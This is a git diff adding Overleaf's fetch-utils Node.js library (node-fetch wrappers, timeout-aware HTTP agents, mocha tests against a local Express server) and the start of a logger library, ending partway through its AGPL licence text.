--git
a/libraries/fetch-utils/.nvmrc b/libraries/fetch-utils/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/libraries/fetch-utils/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/libraries/fetch-utils/buildscript.txt b/libraries/fetch-utils/buildscript.txt new file mode 100644 index 0000000..a158079 --- /dev/null +++ b/libraries/fetch-utils/buildscript.txt @@ -0,0 +1,10 @@ +fetch-utils +--dependencies=None +--docker-repos=gcr.io/overleaf-ops +--env-add= +--env-pass-through= +--esmock-loader=False +--is-library=True +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/libraries/fetch-utils/index.js b/libraries/fetch-utils/index.js new file mode 100644 index 0000000..643dcc7 --- /dev/null +++ b/libraries/fetch-utils/index.js @@ -0,0 +1,320 @@ +const _ = require('lodash') +const { Readable } = require('node:stream') +const OError = require('@overleaf/o-error') +const fetch = require('node-fetch') +const http = require('node:http') +const https = require('node:https') + +/** + * @import { Response } from 'node-fetch' + */ + +/** + * Make a request and return the parsed JSON response. + * + * @param {string | URL} url - request URL + * @param {any} [opts] - fetch options + * @return {Promise<any>} the parsed JSON response + * @throws {RequestFailedError} if the response has a failure status code + */ +async function fetchJson(url, opts = {}) { + const { json } = await fetchJsonWithResponse(url, opts) + return json +} + +async function fetchJsonWithResponse(url, opts = {}) { + const { fetchOpts } = parseOpts(opts) + fetchOpts.headers = fetchOpts.headers ?? {} + fetchOpts.headers.Accept = fetchOpts.headers.Accept ?? 'application/json' + + const response = await performRequest(url, fetchOpts) + if (!response.ok) { + const body = await maybeGetResponseBody(response) + throw new RequestFailedError(url, opts, response, body) + } + + const json = await response.json() + return { json, response } +} + +/** + * Make a request and return a stream. + * + * If the response body is destroyed, the request is aborted. + * + * @param {string | URL} url - request URL + * @param {any} [opts] - fetch options + * @return {Promise<Readable>} + * @throws {RequestFailedError} if the response has a failure status code + */ +async function fetchStream(url, opts = {}) { + const { stream } = await fetchStreamWithResponse(url, opts) + return stream +} + +async function fetchStreamWithResponse(url, opts = {}) { + const { fetchOpts, abortController } = parseOpts(opts) + const response = await performRequest(url, fetchOpts) + + if (!response.ok) { + const body = await maybeGetResponseBody(response) + throw new RequestFailedError(url, opts, response, body) + } + + abortOnDestroyedResponse(abortController, response) + + const stream = response.body + return { stream, response } +} + +/** + * Make a request and discard the response. + * + * @param {string | URL} url - request URL + * @param {any} [opts] - fetch options + * @return {Promise<Response>} + * @throws {RequestFailedError} if the response has a failure status code + */ +async function fetchNothing(url, opts = {}) { + const { fetchOpts } = parseOpts(opts) + const response = await performRequest(url, fetchOpts) + if (!response.ok) { + const body = await maybeGetResponseBody(response) + throw new RequestFailedError(url, opts, response, body) + } + await discardResponseBody(response) + return response +} + +/** + * Make a request and extract the redirect from the response.
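+ * The redirect is not followed: the request is made with redirect: 'manual'
+ * and the value of the Location response header is returned.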
+ * + * @param {string | URL} url - request URL + * @param {any} [opts] - fetch options + * @return {Promise<string>} + * @throws {RequestFailedError} if the response has a non-redirect status code or a missing Location header + */ +async function fetchRedirect(url, opts = {}) { + const { location } = await fetchRedirectWithResponse(url, opts) + return location +} + +/** + * Make a request and extract the redirect from the response. + * + * @param {string | URL} url - request URL + * @param {object} opts - fetch options + * @return {Promise<{location: string, response: Response}>} + * @throws {RequestFailedError} if the response has a non-redirect status code or a missing Location header + */ +async function fetchRedirectWithResponse(url, opts = {}) { + const { fetchOpts } = parseOpts(opts) + fetchOpts.redirect = 'manual' + const response = await performRequest(url, fetchOpts) + if (response.status < 300 || response.status >= 400) { + const body = await maybeGetResponseBody(response) + throw new RequestFailedError(url, opts, response, body) + } + const location = response.headers.get('Location') + if (!location) { + const body = await maybeGetResponseBody(response) + throw new RequestFailedError(url, opts, response, body).withCause( + new OError('missing Location response header on 3xx response', { + headers: Object.fromEntries(response.headers.entries()), + }) + ) + } + await discardResponseBody(response) + return { location, response } +} + +/** + * Make a request and return a string. + * + * @param {string | URL} url - request URL + * @param {any} [opts] - fetch options + * @return {Promise<string>} + * @throws {RequestFailedError} if the response has a failure status code + */ +async function fetchString(url, opts = {}) { + const { body } = await fetchStringWithResponse(url, opts) + return body +} + +async function fetchStringWithResponse(url, opts = {}) { + const { fetchOpts } = parseOpts(opts) + const response = await performRequest(url, fetchOpts) + if (!response.ok) { + const body = await maybeGetResponseBody(response) + throw new RequestFailedError(url, opts, response, body) + } + const body = await response.text() + return { body, response } +} + +class RequestFailedError extends OError { + constructor(url, opts, response, body) { + super('request failed', { + url, + method: opts.method ?? 'GET', + status: response.status, + }) + + this.response = response + if (body != null) { + this.body = body + } + } +} + +function parseOpts(opts) { + const fetchOpts = _.omit(opts, ['json', 'signal', 'basicAuth']) + if (opts.json) { + setupJsonBody(fetchOpts, opts.json) + } + if (opts.basicAuth) { + setupBasicAuth(fetchOpts, opts.basicAuth) + } + + const abortController = new AbortController() + fetchOpts.signal = abortController.signal + if (opts.signal) { + abortOnSignal(abortController, opts.signal) + } + if (opts.body instanceof Readable) { + abortOnDestroyedRequest(abortController, fetchOpts.body) + } + return { fetchOpts, abortController } +} + +function setupJsonBody(fetchOpts, json) { + fetchOpts.body = JSON.stringify(json) + fetchOpts.headers = fetchOpts.headers ?? {} + fetchOpts.headers['Content-Type'] = 'application/json' +} + +function setupBasicAuth(fetchOpts, basicAuth) { + fetchOpts.headers = fetchOpts.headers ??
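/* Editor's note (illustrative): the basicAuth option handled here means that
   await fetchJson('https://example.com/api', { basicAuth: { user: 'user', password: 'pass' } })
   sends an Authorization: Basic <base64("user:pass")> request header. */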
{} + fetchOpts.headers.Authorization = + 'Basic ' + + Buffer.from(`${basicAuth.user}:${basicAuth.password}`).toString('base64') +} + +function abortOnSignal(abortController, signal) { + const listener = () => { + abortController.abort(signal.reason) + } + if (signal.aborted) { + abortController.abort(signal.reason) + } + signal.addEventListener('abort', listener) +} + +function abortOnDestroyedRequest(abortController, stream) { + stream.on('close', () => { + if (!stream.readableEnded) { + abortController.abort() + } + }) +} + +function abortOnDestroyedResponse(abortController, response) { + response.body.on('close', () => { + if (!response.bodyUsed) { + abortController.abort() + } + }) +} + +async function performRequest(url, fetchOpts) { + let response + try { + response = await fetch(url, fetchOpts) + } catch (err) { + if (fetchOpts.body instanceof Readable) { + fetchOpts.body.destroy() + } + throw OError.tag(err, err.message, { + url, + method: fetchOpts.method ?? 'GET', + }) + } + if (fetchOpts.body instanceof Readable) { + response.body.on('close', () => { + if (!fetchOpts.body.readableEnded) { + fetchOpts.body.destroy() + } + }) + } + return response +} + +async function discardResponseBody(response) { + // eslint-disable-next-line no-unused-vars + for await (const chunk of response.body) { + // discard the body + } +} + +/** + * @param {Response} response + */ +async function maybeGetResponseBody(response) { + try { + return await response.text() + } catch (err) { + return null + } +} + +// Define custom http and https agents with support for connect timeouts + +class ConnectTimeoutError extends OError { + constructor(options) { + super('connect timeout', options) + } +} + +function withTimeout(createConnection, options, callback) { + if (options.connectTimeout) { + // Wrap createConnection in a timeout + const timer = setTimeout(() => { + socket.destroy(new ConnectTimeoutError(options)) + }, options.connectTimeout) + const socket = createConnection(options, (err, stream) => { + clearTimeout(timer) + callback(err, stream) + }) + return socket + } else { + // Fallback to default createConnection + return createConnection(options, callback) + } +} + +class CustomHttpAgent extends http.Agent { + createConnection(options, callback) { + return withTimeout(super.createConnection.bind(this), options, callback) + } +} +class CustomHttpsAgent extends https.Agent { + createConnection(options, callback) { + return withTimeout(super.createConnection.bind(this), options, callback) + } +} + +module.exports = { + fetchJson, + fetchJsonWithResponse, + fetchStream, + fetchStreamWithResponse, + fetchNothing, + fetchRedirect, + fetchRedirectWithResponse, + fetchString, + fetchStringWithResponse, + RequestFailedError, + ConnectTimeoutError, + CustomHttpAgent, + CustomHttpsAgent, +} diff --git a/libraries/fetch-utils/package.json b/libraries/fetch-utils/package.json new file mode 100644 index 0000000..95c4d13 --- /dev/null +++ b/libraries/fetch-utils/package.json @@ -0,0 +1,33 @@ +{ + "name": "@overleaf/fetch-utils", + "version": "0.1.0", + "description": "utilities for node-fetch", + "main": "index.js", + "scripts": { + "test": "npm run lint && npm run format && npm run types:check && npm run test:unit", + "lint": "eslint --ext .js --ext .cjs --ext .ts --max-warnings 0 --format unix .", + "lint:fix": "eslint --fix --ext .js --ext .cjs --ext .ts .", + "format": "prettier --list-different $PWD/'**/*.{js,cjs,ts}'", + "format:fix": "prettier --write $PWD/'**/*.{js,cjs,ts}'", + "test:ci": "npm run 
test:unit", + "test:unit": "mocha --exit test/**/*.{js,cjs}", + "types:check": "tsc --noEmit" + }, + "author": "Overleaf (https://www.overleaf.com)", + "license": "AGPL-3.0-only", + "devDependencies": { + "@types/node-fetch": "^2.6.11", + "body-parser": "^1.20.3", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "express": "^4.21.2", + "mocha": "^11.1.0", + "typescript": "^5.0.4" + }, + "dependencies": { + "@overleaf/o-error": "*", + "lodash": "^4.17.21", + "node-fetch": "^2.7.0", + "selfsigned": "^2.4.1" + } +} diff --git a/libraries/fetch-utils/test/setup.js b/libraries/fetch-utils/test/setup.js new file mode 100644 index 0000000..0906818 --- /dev/null +++ b/libraries/fetch-utils/test/setup.js @@ -0,0 +1,4 @@ +const chai = require('chai') +const chaiAsPromised = require('chai-as-promised') + +chai.use(chaiAsPromised) diff --git a/libraries/fetch-utils/test/unit/FetchUtilsTests.js b/libraries/fetch-utils/test/unit/FetchUtilsTests.js new file mode 100644 index 0000000..e9fd0ff --- /dev/null +++ b/libraries/fetch-utils/test/unit/FetchUtilsTests.js @@ -0,0 +1,414 @@ +const { expect } = require('chai') +const { FetchError, AbortError } = require('node-fetch') +const { Readable } = require('node:stream') +const { once } = require('node:events') +const { TestServer } = require('./helpers/TestServer') +const selfsigned = require('selfsigned') +const { + fetchJson, + fetchStream, + fetchNothing, + fetchRedirect, + fetchString, + RequestFailedError, + CustomHttpAgent, + CustomHttpsAgent, +} = require('../..') + +const HTTP_PORT = 30001 +const HTTPS_PORT = 30002 + +const attrs = [{ name: 'commonName', value: 'example.com' }] +const pems = selfsigned.generate(attrs, { days: 365 }) + +const PRIVATE_KEY = pems.private +const PUBLIC_CERT = pems.cert + +const dns = require('node:dns') +const _originalLookup = dns.lookup +// Custom DNS resolver function +dns.lookup = (hostname, options, callback) => { + if (hostname === 'example.com') { + // If the hostname is our test case, return the ip address for the test server + if (options?.all) { + callback(null, [{ address: '127.0.0.1', family: 4 }]) + } else { + callback(null, '127.0.0.1', 4) + } + } else { + // Otherwise, use the default lookup + _originalLookup(hostname, options, callback) + } +} + +describe('fetch-utils', function () { + before(async function () { + this.server = new TestServer() + await this.server.start(HTTP_PORT, HTTPS_PORT, { + key: PRIVATE_KEY, + cert: PUBLIC_CERT, + }) + this.url = path => `http://example.com:${HTTP_PORT}${path}` + this.httpsUrl = path => `https://example.com:${HTTPS_PORT}${path}` + }) + + beforeEach(function () { + this.server.lastReq = undefined + }) + + after(async function () { + await this.server.stop() + }) + + describe('fetchJson', function () { + it('parses a JSON response', async function () { + const json = await fetchJson(this.url('/json/hello')) + expect(json).to.deep.equal({ msg: 'hello' }) + }) + + it('parses JSON in the request', async function () { + const json = await fetchJson(this.url('/json/add'), { + method: 'POST', + json: { a: 2, b: 3 }, + }) + expect(json).to.deep.equal({ sum: 5 }) + }) + + it('accepts stringified JSON as body', async function () { + const json = await fetchJson(this.url('/json/add'), { + method: 'POST', + body: JSON.stringify({ a: 2, b: 3 }), + headers: { 'Content-Type': 'application/json' }, + }) + expect(json).to.deep.equal({ sum: 5 }) + }) + + it('throws a FetchError when the payload is not JSON', async function () { + await 
expect(fetchJson(this.url('/hello'))).to.be.rejectedWith(FetchError) + }) + + it('aborts the request if JSON parsing fails', async function () { + await expect(fetchJson(this.url('/large'))).to.be.rejectedWith(FetchError) + await expectRequestAborted(this.server.lastReq) + }) + + it('handles errors when the payload is JSON', async function () { + await expect(fetchJson(this.url('/json/500'))).to.be.rejectedWith( + RequestFailedError + ) + await expectRequestAborted(this.server.lastReq) + }) + + it('handles errors when the payload is not JSON', async function () { + await expect(fetchJson(this.url('/500'))).to.be.rejectedWith( + RequestFailedError + ) + await expectRequestAborted(this.server.lastReq) + }) + + it('supports abort signals', async function () { + await expect( + abortOnceReceived( + signal => fetchJson(this.url('/hang'), { signal }), + this.server + ) + ).to.be.rejectedWith(AbortError) + await expectRequestAborted(this.server.lastReq) + }) + + it('supports basic auth', async function () { + const json = await fetchJson(this.url('/json/basic-auth'), { + basicAuth: { user: 'user', password: 'pass' }, + }) + expect(json).to.deep.equal({ key: 'verysecret' }) + }) + + it("destroys the request body if it doesn't get consumed", async function () { + const stream = Readable.from(infiniteIterator()) + await fetchJson(this.url('/json/ignore-request'), { + method: 'POST', + body: stream, + }) + expect(stream.destroyed).to.be.true + }) + }) + + describe('fetchStream', function () { + it('returns a stream', async function () { + const stream = await fetchStream(this.url('/large')) + const text = await streamToString(stream) + expect(text).to.equal(this.server.largePayload) + }) + + it('aborts the request when the stream is destroyed', async function () { + const stream = await fetchStream(this.url('/large')) + stream.destroy() + await expectRequestAborted(this.server.lastReq) + }) + + it('aborts the request when the request body is destroyed before transfer', async function () { + const stream = Readable.from(infiniteIterator()) + const promise = fetchStream(this.url('/hang'), { + method: 'POST', + body: stream, + }) + stream.destroy() + await expect(promise).to.be.rejectedWith(AbortError) + await wait(80) + expect(this.server.lastReq).to.be.undefined + }) + + it('aborts the request when the request body is destroyed during transfer', async function () { + const stream = Readable.from(infiniteIterator()) + // Note: this test won't work on `/hang` + const promise = fetchStream(this.url('/sink'), { + method: 'POST', + body: stream, + }) + await once(this.server.events, 'request-received') + stream.destroy() + await expect(promise).to.be.rejectedWith(AbortError) + await expectRequestAborted(this.server.lastReq) + }) + + it('handles errors', async function () { + await expect(fetchStream(this.url('/500'))).to.be.rejectedWith( + RequestFailedError + ) + await expectRequestAborted(this.server.lastReq) + }) + + it('supports abort signals', async function () { + await expect( + abortOnceReceived( + signal => fetchStream(this.url('/hang'), { signal }), + this.server + ) + ).to.be.rejectedWith(AbortError) + await expectRequestAborted(this.server.lastReq) + }) + + it('destroys the request body when an error occurs', async function () { + const stream = Readable.from(infiniteIterator()) + await expect( + abortOnceReceived( + signal => + fetchStream(this.url('/hang'), { + method: 'POST', + body: stream, + signal, + }), + this.server + ) + ).to.be.rejectedWith(AbortError) + 
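/* Usage sketch (illustrative; the URL is a placeholder): callers cancel a
   request with the standard AbortController pattern exercised above:

   const controller = new AbortController()
   const promise = fetchStream('http://example.com/slow', {
     signal: controller.signal,
   })
   controller.abort() // the promise rejects with an AbortError
*/
+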
expect(stream.destroyed).to.be.true + }) + }) + + describe('fetchNothing', function () { + it('closes the connection', async function () { + await fetchNothing(this.url('/large')) + await expectRequestAborted(this.server.lastReq) + }) + + it('aborts the request when the request body is destroyed before transfer', async function () { + const stream = Readable.from(infiniteIterator()) + const promise = fetchNothing(this.url('/hang'), { + method: 'POST', + body: stream, + }) + stream.destroy() + await expect(promise).to.be.rejectedWith(AbortError) + expect(this.server.lastReq).to.be.undefined + }) + + it('aborts the request when the request body is destroyed during transfer', async function () { + const stream = Readable.from(infiniteIterator()) + // Note: this test won't work on `/hang` + const promise = fetchNothing(this.url('/sink'), { + method: 'POST', + body: stream, + }) + await once(this.server.events, 'request-received') + stream.destroy() + await expect(promise).to.be.rejectedWith(AbortError) + await wait(80) + await expectRequestAborted(this.server.lastReq) + }) + + it("doesn't abort the request if the request body ends normally", async function () { + const stream = Readable.from('hello there') + await fetchNothing(this.url('/sink'), { method: 'POST', body: stream }) + }) + + it('handles errors', async function () { + await expect(fetchNothing(this.url('/500'))).to.be.rejectedWith( + RequestFailedError + ) + await expectRequestAborted(this.server.lastReq) + }) + + it('supports abort signals', async function () { + await expect( + abortOnceReceived( + signal => fetchNothing(this.url('/hang'), { signal }), + this.server + ) + ).to.be.rejectedWith(AbortError) + await expectRequestAborted(this.server.lastReq) + }) + + it('destroys the request body when an error occurs', async function () { + const stream = Readable.from(infiniteIterator()) + await expect( + abortOnceReceived( + signal => + fetchNothing(this.url('/hang'), { + method: 'POST', + body: stream, + signal, + }), + this.server + ) + ).to.be.rejectedWith(AbortError) + expect(stream.destroyed).to.be.true + }) + }) + + describe('fetchString', function () { + it('returns a string', async function () { + const body = await fetchString(this.url('/hello')) + expect(body).to.equal('hello') + }) + + it('handles errors', async function () { + await expect(fetchString(this.url('/500'))).to.be.rejectedWith( + RequestFailedError + ) + await expectRequestAborted(this.server.lastReq) + }) + }) + + describe('fetchRedirect', function () { + it('returns the immediate redirect', async function () { + const body = await fetchRedirect(this.url('/redirect/1')) + expect(body).to.equal(this.url('/redirect/2')) + }) + + it('rejects status 200', async function () { + await expect(fetchRedirect(this.url('/hello'))).to.be.rejectedWith( + RequestFailedError + ) + await expectRequestAborted(this.server.lastReq) + }) + + it('rejects empty redirect', async function () { + await expect(fetchRedirect(this.url('/redirect/empty-location'))) + .to.be.rejectedWith(RequestFailedError) + .and.eventually.have.property('cause') + .and.to.have.property('message') + .to.equal('missing Location response header on 3xx response') + await expectRequestAborted(this.server.lastReq) + }) + + it('handles errors', async function () { + await expect(fetchRedirect(this.url('/500'))).to.be.rejectedWith( + RequestFailedError + ) + await expectRequestAborted(this.server.lastReq) + }) + }) + + describe('CustomHttpAgent', function () { + it('makes an http request successfully', async 
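/* Editor's note: CustomHttpAgent and CustomHttpsAgent (defined in index.js above) wrap Agent#createConnection so that a connectTimeout option destroys the socket with a ConnectTimeoutError if the connection is not established in time. */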
function () { + const agent = new CustomHttpAgent({ connectTimeout: 100 }) + const body = await fetchString(this.url('/hello'), { agent }) + expect(body).to.equal('hello') + }) + + it('times out when accessing a non-routable address', async function () { + const agent = new CustomHttpAgent({ connectTimeout: 10 }) + await expect(fetchString('http://10.255.255.255/', { agent })) + .to.be.rejectedWith(FetchError) + .and.eventually.have.property('message') + .and.to.equal( + 'request to http://10.255.255.255/ failed, reason: connect timeout' + ) + }) + }) + + describe('CustomHttpsAgent', function () { + it('makes an https request successfully', async function () { + const agent = new CustomHttpsAgent({ + connectTimeout: 100, + ca: PUBLIC_CERT, + }) + const body = await fetchString(this.httpsUrl('/hello'), { agent }) + expect(body).to.equal('hello') + }) + + it('rejects an untrusted server', async function () { + const agent = new CustomHttpsAgent({ + connectTimeout: 100, + }) + await expect(fetchString(this.httpsUrl('/hello'), { agent })) + .to.be.rejectedWith(FetchError) + .and.eventually.have.property('code') + .and.to.equal('DEPTH_ZERO_SELF_SIGNED_CERT') + }) + + it('times out when accessing a non-routable address', async function () { + const agent = new CustomHttpsAgent({ connectTimeout: 10 }) + await expect(fetchString('https://10.255.255.255/', { agent })) + .to.be.rejectedWith(FetchError) + .and.eventually.have.property('message') + .and.to.equal( + 'request to https://10.255.255.255/ failed, reason: connect timeout' + ) + }) + }) +}) + +async function streamToString(stream) { + let s = '' + for await (const chunk of stream) { + s += chunk + } + return s +} + +async function* infiniteIterator() { + let i = 1 + while (true) { + yield `chunk ${i++}\n` + } +} + +/** + * @param {(signal: AbortSignal) => Promise} func + * @param {TestServer} server + */ +async function abortOnceReceived(func, server) { + const controller = new AbortController() + const promise = func(controller.signal) + await once(server.events, 'request-received') + controller.abort() + return await promise +} + +async function expectRequestAborted(req) { + if (!req.destroyed) { + try { + await once(req, 'close') + } catch (err) { + // `once` throws if req emits an 'error' event. + // We ignore `Error: aborted` when the request is aborted. 
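+ // Any other error (for example a socket error unrelated to the abort)
+ // is re-thrown so that it fails the test instead of being masked.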
+ if (err.message !== 'aborted') { + throw err + } + } + } + expect(req.destroyed).to.be.true +} + +const wait = ms => new Promise(resolve => setTimeout(resolve, ms)) diff --git a/libraries/fetch-utils/test/unit/helpers/TestServer.js b/libraries/fetch-utils/test/unit/helpers/TestServer.js new file mode 100644 index 0000000..4972777 --- /dev/null +++ b/libraries/fetch-utils/test/unit/helpers/TestServer.js @@ -0,0 +1,130 @@ +const express = require('express') +const bodyParser = require('body-parser') +const { EventEmitter } = require('node:events') +const http = require('node:http') +const https = require('node:https') +const { promisify } = require('node:util') + +class TestServer { + constructor() { + this.app = express() + this.events = new EventEmitter() + + this.app.use(bodyParser.json()) + this.app.use((req, res, next) => { + this.events.emit('request-received') + this.lastReq = req + next() + }) + + // Plain text endpoints + + this.app.get('/hello', (req, res) => { + res.send('hello') + }) + + this.largePayload = 'x'.repeat(16 * 1024 * 1024) + this.app.get('/large', (req, res) => { + res.send(this.largePayload) + }) + + this.app.get('/204', (req, res) => { + res.status(204).end() + }) + + this.app.get('/empty', (req, res) => { + res.end() + }) + + this.app.get('/500', (req, res) => { + res.sendStatus(500) + }) + + this.app.post('/sink', (req, res) => { + req.on('data', () => {}) + req.on('end', () => { + res.status(204).end() + }) + }) + + // JSON endpoints + + this.app.get('/json/hello', (req, res) => { + res.json({ msg: 'hello' }) + }) + + this.app.post('/json/add', (req, res) => { + const { a, b } = req.body + res.json({ sum: a + b }) + }) + + this.app.get('/json/500', (req, res) => { + res.status(500).json({ error: 'Internal server error' }) + }) + + this.app.get('/json/basic-auth', (req, res) => { + const expectedAuth = + 'Basic ' + Buffer.from('user:pass').toString('base64') + if (req.headers.authorization === expectedAuth) { + res.json({ key: 'verysecret' }) + } else { + res.status(401).json({ error: 'unauthorized' }) + } + }) + + this.app.post('/json/ignore-request', (req, res) => { + res.json({ msg: 'hello' }) + }) + + // Never returns + + this.app.get('/hang', (req, res) => {}) + this.app.post('/hang', (req, res) => {}) + + // Redirect + + this.app.get('/redirect/1', (req, res) => { + res.redirect('/redirect/2') + }) + this.app.get('/redirect/2', (req, res) => { + res.send('body after redirect') + }) + this.app.get('/redirect/empty-location', (req, res) => { + res.sendStatus(302) + }) + } + + start(port, httpsPort, httpsOptions) { + const startHttp = new Promise((resolve, reject) => { + this.server = http.createServer(this.app).listen(port, err => { + if (err) { + reject(err) + } else { + resolve() + } + }) + }) + const startHttps = new Promise((resolve, reject) => { + this.https_server = https + .createServer(httpsOptions, this.app) + .listen(httpsPort, err => { + if (err) { + reject(err) + } else { + resolve() + } + }) + }) + return Promise.all([startHttp, startHttps]) + } + + stop() { + const stopHttp = promisify(this.server.close).bind(this.server) + const stopHttps = promisify(this.https_server.close).bind(this.https_server) + this.server.closeAllConnections() + this.https_server.closeAllConnections() + return Promise.all([stopHttp(), stopHttps()]) + } +} + +module.exports = { TestServer } diff --git a/libraries/fetch-utils/tsconfig.json b/libraries/fetch-utils/tsconfig.json new file mode 100644 index 0000000..d43bb24 --- /dev/null +++ 
b/libraries/fetch-utils/tsconfig.json @@ -0,0 +1,7 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "**/*.js", + "**/*.cjs" + ] +} diff --git a/libraries/logger/.gitignore b/libraries/logger/.gitignore new file mode 100644 index 0000000..2006c87 --- /dev/null +++ b/libraries/logger/.gitignore @@ -0,0 +1,3 @@ +node_modules + +.npmrc diff --git a/libraries/logger/.mocharc.json b/libraries/logger/.mocharc.json new file mode 100644 index 0000000..dc3280a --- /dev/null +++ b/libraries/logger/.mocharc.json @@ -0,0 +1,3 @@ +{ + "require": "test/setup.js" +} diff --git a/libraries/logger/.nvmrc b/libraries/logger/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/libraries/logger/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/libraries/logger/CHANGELOG.md b/libraries/logger/CHANGELOG.md new file mode 100644 index 0000000..a581cf4 --- /dev/null +++ b/libraries/logger/CHANGELOG.md @@ -0,0 +1,10 @@ +## v3.1.1 + +* Handle malformed requests in the req serializer + +## v3.0.0 + +* Improve logging in Google Cloud Platform. Set environment variable `GCP_LOGGING=true` to enable. + +This version of the logger module only works with versions of the `@overleaf/metrics` module greater than v4.0.0 + diff --git a/libraries/logger/LICENSE.txt b/libraries/logger/LICENSE.txt new file mode 100644 index 0000000..dba13ed --- /dev/null +++ b/libraries/logger/LICENSE.txt @@ -0,0 +1,661 @@ + GNU AFFERO GENERAL PUBLIC LICENSE + Version 3, 19 November 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU Affero General Public License is a free, copyleft license for +software and other kinds of works, specifically designed to ensure +cooperation with the community in the case of network server software. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +our General Public Licenses are intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + Developers that use our General Public Licenses protect your rights +with two steps: (1) assert copyright on the software, and (2) offer +you this License which gives you legal permission to copy, distribute +and/or modify the software. + + A secondary benefit of defending all users' freedom is that +improvements made in alternate versions of the program, if they +receive widespread use, become available for other developers to +incorporate. Many developers of free software are heartened and +encouraged by the resulting cooperation. However, in the case of +software used on network servers, this result may fail to come about. +The GNU General Public License permits making a modified version and +letting the public access it on a server without ever releasing its +source code to the public.
+ + The GNU Affero General Public License is designed specifically to +ensure that, in such cases, the modified source code becomes available +to the community. It requires the operator of a network server to +provide the source code of the modified version running there to the +users of that server. Therefore, public use of a modified version, on +a publicly accessible server, gives the public access to the source +code of the modified version. + + An older license, called the Affero General Public License and +published by Affero, was designed to accomplish similar goals. This is +a different license, not a version of the Affero GPL, but Affero has +released a new version of the Affero GPL which permits relicensing under +this license. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU Affero General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. 
+ + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. 
+ + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry 